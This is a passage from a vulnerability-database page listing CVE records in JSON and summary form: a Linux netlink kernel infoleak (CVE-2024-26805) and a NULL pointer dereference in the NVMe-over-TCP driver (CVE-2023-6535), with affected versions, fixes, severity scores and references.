"status": "unaffected",
"version": "6.1.81",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.21",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.309",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.271",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.212",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.151",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.81",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.21",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.9",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.12.49",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.14.54",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.18.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.1.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.2.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetlink: Fix kernel-infoleak-after-free in __skb_datagram_iter\n\nsyzbot reported the following uninit-value access issue [1]:\n\nnetlink_to_full_skb() creates a new `skb` and puts the `skb-\u003edata`\npassed as a 1st arg of netlink_to_full_skb() onto new `skb`. The data\nsize is specified as `len` and passed to skb_put_data(). This `len`\nis based on `skb-\u003eend` that is not data offset but buffer offset. The\n`skb-\u003eend` contains data and tailroom. Since the tailroom is not\ninitialized when the new `skb` created, KMSAN detects uninitialized\nmemory area when copying the data.\n\nThis patch resolved this issue by correct the len from `skb-\u003eend` to\n`skb-\u003elen`, which is the actual data offset.\n\nBUG: KMSAN: kernel-infoleak-after-free in instrument_copy_to_user include/linux/instrumented.h:114 [inline]\nBUG: KMSAN: kernel-infoleak-after-free in copy_to_user_iter lib/iov_iter.c:24 [inline]\nBUG: KMSAN: kernel-infoleak-after-free in iterate_ubuf include/linux/iov_iter.h:29 [inline]\nBUG: KMSAN: kernel-infoleak-after-free in iterate_and_advance2 include/linux/iov_iter.h:245 [inline]\nBUG: KMSAN: kernel-infoleak-after-free in iterate_and_advance include/linux/iov_iter.h:271 [inline]\nBUG: KMSAN: kernel-infoleak-after-free in _copy_to_iter+0x364/0x2520 lib/iov_iter.c:186\n instrument_copy_to_user include/linux/instrumented.h:114 [inline]\n copy_to_user_iter lib/iov_iter.c:24 [inline]\n iterate_ubuf include/linux/iov_iter.h:29 [inline]\n iterate_and_advance2 include/linux/iov_iter.h:245 [inline]\n iterate_and_advance include/linux/iov_iter.h:271 [inline]\n _copy_to_iter+0x364/0x2520 lib/iov_iter.c:186\n copy_to_iter include/linux/uio.h:197 [inline]\n simple_copy_to_iter+0x68/0xa0 net/core/datagram.c:532\n __skb_datagram_iter+0x123/0xdc0 net/core/datagram.c:420\n skb_copy_datagram_iter+0x5c/0x200 net/core/datagram.c:546\n skb_copy_datagram_msg include/linux/skbuff.h:3960 [inline]\n packet_recvmsg+0xd9c/0x2000 net/packet/af_packet.c:3482\n sock_recvmsg_nosec net/socket.c:1044 [inline]\n sock_recvmsg net/socket.c:1066 [inline]\n sock_read_iter+0x467/0x580 net/socket.c:1136\n call_read_iter include/linux/fs.h:2014 [inline]\n new_sync_read fs/read_write.c:389 [inline]\n vfs_read+0x8f6/0xe00 fs/read_write.c:470\n ksys_read+0x20f/0x4c0 fs/read_write.c:613\n __do_sys_read fs/read_write.c:623 [inline]\n __se_sys_read fs/read_write.c:621 [inline]\n __x64_sys_read+0x93/0xd0 fs/read_write.c:621\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0x44/0x110 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x63/0x6b\n\nUninit was stored to memory at:\n skb_put_data include/linux/skbuff.h:2622 [inline]\n netlink_to_full_skb net/netlink/af_netlink.c:181 [inline]\n __netlink_deliver_tap_skb net/netlink/af_netlink.c:298 [inline]\n __netlink_deliver_tap+0x5be/0xc90 net/netlink/af_netlink.c:325\n netlink_deliver_tap net/netlink/af_netlink.c:338 [inline]\n netlink_deliver_tap_kernel net/netlink/af_netlink.c:347 [inline]\n netlink_unicast_kernel net/netlink/af_netlink.c:1341 [inline]\n netlink_unicast+0x10f1/0x1250 net/netlink/af_netlink.c:1368\n netlink_sendmsg+0x1238/0x13d0 net/netlink/af_netlink.c:1910\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg net/socket.c:745 [inline]\n ____sys_sendmsg+0x9c2/0xd60 net/socket.c:2584\n ___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638\n __sys_sendmsg net/socket.c:2667 [inline]\n __do_sys_sendmsg net/socket.c:2676 [inline]\n __se_sys_sendmsg net/socket.c:2674 [inline]\n __x64_sys_sendmsg+0x307/0x490 net/socket.c:2674\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0x44/0x110 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x63/0x6b\n\nUninit was created at:\n free_pages_prepare mm/page_alloc.c:1087 [inline]\n free_unref_page_prepare+0xb0/0xa40 mm/page_alloc.c:2347\n free_unref_page_list+0xeb/0x1100 mm/page_alloc.c:2533\n release_pages+0x23d3/0x2410 mm/swap.c:1042\n free_pages_and_swap_cache+0xd9/0xf0 mm/swap_state.c:316\n tlb_batch_pages\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:54:47.795Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ec343a55b687a452f5e87f3b52bf9f155864df65"
},
{
"url": "https://git.kernel.org/stable/c/9ae51361da43270f4ba0eb924427a07e87e48777"
},
{
"url": "https://git.kernel.org/stable/c/f19d1f98e60e68b11fc60839105dd02a30ec0d77"
},
{
"url": "https://git.kernel.org/stable/c/c71ed29d15b1a1ed6c464f8c3536996963046285"
},
{
"url": "https://git.kernel.org/stable/c/0b27bf4c494d61e5663baa34c3edd7ccebf0ea44"
},
{
"url": "https://git.kernel.org/stable/c/d3ada42e534a83b618bbc1e490d23bf0fdae4736"
},
{
"url": "https://git.kernel.org/stable/c/59fc3e3d049e39e7d0d271f20dd5fb47c57faf1d"
},
{
"url": "https://git.kernel.org/stable/c/661779e1fcafe1b74b3f3fe8e980c1e207fea1fd"
}
],
"title": "netlink: Fix kernel-infoleak-after-free in __skb_datagram_iter",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26805",
"datePublished": "2024-04-04T08:20:32.250Z",
"dateReserved": "2024-02-19T14:20:24.179Z",
"dateUpdated": "2025-05-04T12:54:47.795Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-6535 (GCVE-0-2023-6535)
Vulnerability from cvelistv5
Published
2024-02-07 21:04
Modified
2025-11-06 21:45
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-476 - NULL Pointer Dereference
Summary
A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, causing kernel panic and a denial of service.
References
| URL | Tags | |||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Red Hat | Red Hat Enterprise Linux 8 |
Unaffected: 0:4.18.0-513.18.1.rt7.320.el8_9 < * cpe:/a:redhat:enterprise_linux:8::realtime cpe:/a:redhat:enterprise_linux:8::nfv |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-6535",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-08T17:12:36.607009Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-04-24T15:58:14.946Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T18:22:00.240Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "RHSA-2024:0723",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0723"
},
{
"name": "RHSA-2024:0724",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0724"
},
{
"name": "RHSA-2024:0725",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0725"
},
{
"name": "RHSA-2024:0881",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0881"
},
{
"name": "RHSA-2024:0897",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0897"
},
{
"name": "RHSA-2024:1248",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1248"
},
{
"name": "RHSA-2024:2094",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2094"
},
{
"name": "RHSA-2024:3810",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3810"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-6535"
},
{
"name": "RHBZ#2254053",
"tags": [
"issue-tracking",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254053"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20240415-0003/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFYW6R64GPLUOXSQBJI3JBUX3HGLAYPP/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::realtime",
"cpe:/a:redhat:enterprise_linux:8::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-513.18.1.rt7.320.el8_9",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::crb",
"cpe:/o:redhat:enterprise_linux:8::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-513.18.1.el8_9",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:8.6::crb",
"cpe:/o:redhat:rhev_hypervisor:4.4::el8",
"cpe:/o:redhat:rhel_eus:8.6::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.6 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-372.91.1.el8_6",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:8.8::crb",
"cpe:/o:redhat:rhel_eus:8.8::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.8 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-477.58.1.el8_8",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::appstream",
"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::nfv",
"cpe:/a:redhat:enterprise_linux:9::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-362.24.1.el9_3",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::appstream",
"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::nfv",
"cpe:/a:redhat:enterprise_linux:9::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-362.24.1.el9_3",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.2::crb",
"cpe:/o:redhat:rhel_eus:9.2::baseos",
"cpe:/a:redhat:rhel_eus:9.2::appstream"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-284.52.1.el9_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.2::realtime",
"cpe:/a:redhat:rhel_eus:9.2::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-284.52.1.rt14.337.el9_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:8.6::crb",
"cpe:/o:redhat:rhev_hypervisor:4.4::el8",
"cpe:/o:redhat:rhel_eus:8.6::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-372.91.1.el8_6",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/cluster-logging-operator-bundle",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-22",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/cluster-logging-rhel9-operator",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-11",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch6-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v6.8.1-407",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-operator-bundle",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-19",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-proxy-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v1.0.0-479",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-rhel9-operator",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-7",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/eventrouter-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.4.0-247",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/fluentd-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-5",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/log-file-metric-exporter-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v1.1.0-227",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/logging-curator5-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.1-470",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/logging-loki-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v2.9.6-14",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/logging-view-plugin-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/loki-operator-bundle",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-24",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/loki-rhel9-operator",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-10",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/lokistack-gateway-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.1.0-525",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/opa-openshift-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.1.0-224",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/vector-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.28.1-56",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
}
],
"credits": [
{
"lang": "en",
"value": "Red Hat would like to thank Alon Zahavi for reporting this issue."
}
],
"datePublic": "2023-12-11T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in the Linux kernel\u0027s NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, causing kernel panic and a denial of service."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Moderate"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-06T21:45:16.229Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"name": "RHSA-2024:0723",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0723"
},
{
"name": "RHSA-2024:0724",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0724"
},
{
"name": "RHSA-2024:0725",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0725"
},
{
"name": "RHSA-2024:0881",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0881"
},
{
"name": "RHSA-2024:0897",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0897"
},
{
"name": "RHSA-2024:1248",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1248"
},
{
"name": "RHSA-2024:2094",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2094"
},
{
"name": "RHSA-2024:3810",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3810"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-6535"
},
{
"name": "RHBZ#2254053",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254053"
}
],
"timeline": [
{
"lang": "en",
"time": "2023-12-11T00:00:00+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2023-12-11T00:00:00+00:00",
"value": "Made public."
}
],
"title": "Kernel: null pointer dereference in nvmet_tcp_execute_request",
"workarounds": [
{
"lang": "en",
"value": "To mitigate this issue, prevent module nvmet-tcp from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically."
}
],
"x_redhatCweChain": "CWE-476: NULL Pointer Dereference"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2023-6535",
"datePublished": "2024-02-07T21:04:21.409Z",
"dateReserved": "2023-12-05T20:50:27.727Z",
"dateUpdated": "2025-11-06T21:45:16.229Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26795 (GCVE-0-2024-26795)
Vulnerability from cvelistv5
Published
2024-04-04 08:20
Modified
2025-05-04 08:56
